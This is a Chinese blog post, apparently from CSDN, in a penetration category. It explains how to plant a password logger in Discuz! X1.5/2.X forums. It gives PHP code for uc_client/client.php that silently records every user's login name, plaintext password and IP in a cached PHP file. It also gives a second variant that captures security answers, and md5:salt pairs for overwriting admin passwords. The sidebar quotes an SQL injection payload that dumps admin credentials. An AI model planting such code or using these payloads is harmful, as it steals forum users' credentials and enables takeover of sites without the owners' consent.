Discuz!X1.5 2.X登陆密码记录

最新推荐文章于 2021-01-01 09:20:40 发布
最新推荐文章于 2021-01-01 09:20:40 发布
阅读量802 收藏
点赞数
分类专栏: web渗透 文章标签: DiscuzX1.5 2.X 登陆密码记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gazhichen/article/details/41723981
版权
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
if(getenv('HTTP_CLIENT_IP')) { 
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) { 
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) { 
$onlineip = getenv('REMOTE_ADDR');
} else { 
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
    $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
    $handle=fopen('./data/cache/csslog.php','a+');

    $write=fwrite($handle,$record);


网上还有一种方法:

//打开source/function/function_member.php
 
//找到function userlogin
 
//在return $return;前面加上
 
$a=file_get_contents(dirname(__FILE__).’/1.txt’);
 
file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);
 
//记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt
 
经过测试没有成功。

几组密码为123456的md5和salt值,供渗透discuz论坛修改密码用:

f9b6a0a1825adc0e5bb77e7daa010793:795da2 
217fee1a3b9c657236d0ed636f2ed36b:c7be77 
85f71aa1e34154bb8a6a8f8183c2a781:1bffdc 



我喜欢美女
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
帖子背景插件 for Discuz!X1.5 GBK.rar
07-14
X1.5 GBK.rar】是一款专为Discuz!X1.5论坛系统设计的GBK编码插件,旨在增强论坛的互动性和个性化体验。这款插件允许用户自定义帖子的背景,为论坛增添了丰富的视觉效果和用户参与度。 Discuz! 是一款广泛使用的开源...
Discuz x2 直接爆出管理用户和密码
hudongge的专栏
10-23 1548
1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 然后到回复补充那里随便补充一下,注入语句就被执行。 补充的地址
Discuz! 数据库结构参考
阳光灿烂的日子
12-21 1402
Discuz! 数据库结构参考总表===>>各表概述cdb_access--当某用户对某些版块有特定的权限的时候,该表记录了该用户在这些版块有什么权限。cdb_admingroups--管理模组信息表cdb_adminsessions--后台管理登录记录cdb_announcements--论坛公告信息cdb_attachments--附件信息表cdb_attachtypes--附件的所性类型(即
Discuz登陆密码记录到文件
weixin_30725315的博客
01-09 208
打开source/function/function_member.php //找到function userlogin//return $return; 前面加上 if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $ip = getenv('HTTP...
hashcat Hash types
ilove737的专栏
05-31 3434
Hash-Mode Hash-Name Example 0 md5 8743b52063cd84097a65d1633f5c74f5 10 md5(pass.pass.salt) 01dfae6e5d4d90d9892622325959afbe:7050461 20 md5(salt.salt.pass) f0fda58630310a6dd91a7d8f0a
使用oclHashcat32破解discuz论坛密码
gazhichen的专栏
12-04 1966
discuz论坛密码加密方式md5(md5($pass).$salt),通过oclHashcat32破解格式如下: oclHashcat32 -m 2611 dz.txt  password.dic
帖子显示头像插件 for Discuz!X1.5 GBK.rar
07-14
X1.5 GBK.rar”表明这是一个专为Discuz!X1.5版本设计的GBK编码插件,主要功能是增强论坛帖子的显示效果,使得用户在浏览帖子时可以看到发帖者的头像。Discuz!是一款非常流行的开源社区论坛软件,广泛应用于国内众多...
页面强制刷新按钮插件 for Discuz!X1.5 GBK.rar
07-14
X1.5 GBK.rar”表明这是一个专为Discuz!X1.5版本设计的GBK编码插件,主要功能是在主题列表页面上添加一个强制刷新按钮。Discuz!是一款非常流行的开源社区论坛软件,GBK是一种常用的中文字符编码标准,用于兼容更多的...
Xweibo for Discuz!X1.5 2.1.5.zip
05-23
X1.5 2.1.5 更新日志:2012-06-13 修复:稳定性修复和CSRF安全问题修复。在此鸣谢水@乌云 Xweibo网站插件是为站长提供的微博连接工具 Xweibo插件版是针对各类型论坛、博客提供应用程序插件,目前支持主流Discuz...
列表缩略图(社区图库)插件 for Discuz!X1.5 GBK.rar
07-14
X1.5 GBK》是一款专为Discuz!X1.5论坛系统设计的增强型插件,它旨在提升社区图片展示效果,为用户提供更加丰富的视觉体验。该插件在GBK编码环境下运行,能够很好地兼容中文字符,确保在多语言社区中的稳定性和用户...
关于UCenter 1.5.2 版以下的一个修改用户密码bug
Chelin Tsien的专栏
02-15 4225
    当使用$_REQUEST全局变量接收数据时,PHP优先接收通过POST提交的数据, 由于这个原因UCenter过滤不严谨导致修改用户密码模块被绕过,现在通过一个简单的例子来说明,绕过的方法,可以PHP程序或HTML来实现,这里我用PHP来说明:fSocket类: http://blog.csdn.net/jun54555/archive/2010/11/15/6010873.aspx通过在前台获取用户的UID, 将其写入数组变量 $data中, 然后注释掉后五项, 然后第一次运行:以获取表单的验证串
社工利器后台密码截获方法
weixin_34248023的博客
12-16 641
为什么80%的码农都做不了架构师?>>> ...
[log] css常用样式
好好学习,天天向上
11-08 295
文字排版 文字截断 场景:一般是处理商品名称过长 white-space: nowrap; overflow: hidden; text-overflow: ellipsis; display: -webkit-box; overflow: hidden; -webkit-line-clamp: 2; -webkit-box-orient: vertical; ...
纯Css log图标切换效果 图片切换
Mr_aswl的博客
01-01 481
Css使用hover,over:hidden属性实现log图标切换功能 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>纯Css log图标切换效果</title>
dz记录密码(xxbing)
cnbird's blog
12-19 1176
dz记录密码(xxbing)
解决DiscuzX3.3登录页面密码明文传输问题
sxg0728的博客
06-01 3583
1、UC_SERVER登录页面修改 2、DISCUZ管理中心登录页面修改
udp分片报文pcap文件
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
计算机教学导案.doc
07-18
计算机
摩根:2024年大市前瞻.pdf
最新发布
07-18
摩根:2024年大市前瞻
Discuz!X安全漏洞详解
" Discuz!X 漏洞的整理涵盖了各种SQL注入漏洞,适用于渗透测试工程师和安全研究员学习研究。" Discuz! 是一个广泛使用的开源社区论坛软件,但随着时间的推移,它的一些历史版本中出现了一系列的安全漏洞,特别是SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值